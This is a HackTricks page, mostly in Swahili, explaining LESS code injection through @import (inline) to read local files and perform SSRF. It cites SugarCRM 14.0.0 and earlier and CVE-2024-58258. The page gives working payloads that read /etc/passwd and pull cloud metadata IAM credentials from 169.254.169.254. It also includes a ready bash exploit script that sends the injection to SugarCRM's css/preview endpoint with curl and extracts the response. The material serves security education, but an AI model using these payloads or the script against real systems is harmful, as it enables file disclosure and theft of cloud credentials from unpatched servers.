LESS Code Injection leading to SSRF & Local File Read

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

LESS ni pre-processor maarufu wa CSS ambayo huongeza variables, mixins, functions na directive yenye nguvu @import. Wakati wa compilation engine ya LESS itatafuta rasilimali zilizotajwa katika statements za @import na kuziweka (“inline”) ndani ya CSS inayotokana wakati chaguo (inline) kinapotumika.

Wakati application inaunganisha user-controlled input katika string ambayo baadaye inachambuliwa na LESS compiler, mshambuliaji anaweza inject arbitrary LESS code. Kwa kuabusu @import (inline) mshambuliaji anaweza kulazimisha server kutafuta:

• Local files kwa kutumia protocol ya file:// (information disclosure / Local File Inclusion).
• Remote resources kwenye mitandao ya ndani au cloud metadata services (SSRF).

Teknika hii imeonekana katika bidhaa za ulimwengu wa kweli kama SugarCRM ≤ 14.0.0 (/rest/v10/css/preview endpoint).

Exploitation

1. Tambua parameter ambayo imeingizwa moja kwa moja ndani ya stylesheet string inayosindikwa na LESS engine (mfano: ?lm= katika SugarCRM).
2. Funga statement ya sasa na inject directives mpya. Primitive za kawaida ni:

• ; – inamaliza declaration iliyopita.
• } – inafunga block iliyopita (ikiwa inahitajika).

3. Tumia @import (inline) '<URL>'; kusoma rasilimali yoyote.
4. Hiari inject marker (data: URI) baada ya import ili kurahisisha extraction ya yaliyopatikana kutoka kwenye compiled CSS.

Local File Read

1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //

Yaliyomo ya /etc/passwd yataonekana katika mwitikio wa HTTP mara tu kabla ya alama ya @@END@@.

SSRF – Metadata ya Cloud

1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //

PoC Otomatiki (mfano wa SugarCRM)

#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd

TARGET="$1"        # Base URL of SugarCRM instance
RESOURCE="$2"      # file:// path or URL to fetch

INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")

curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'

Mifano ya Maisha Halisi

Marejeo

• SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability
• SugarCRM Security Advisory SA-2024-059
• CVE-2024-58258

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.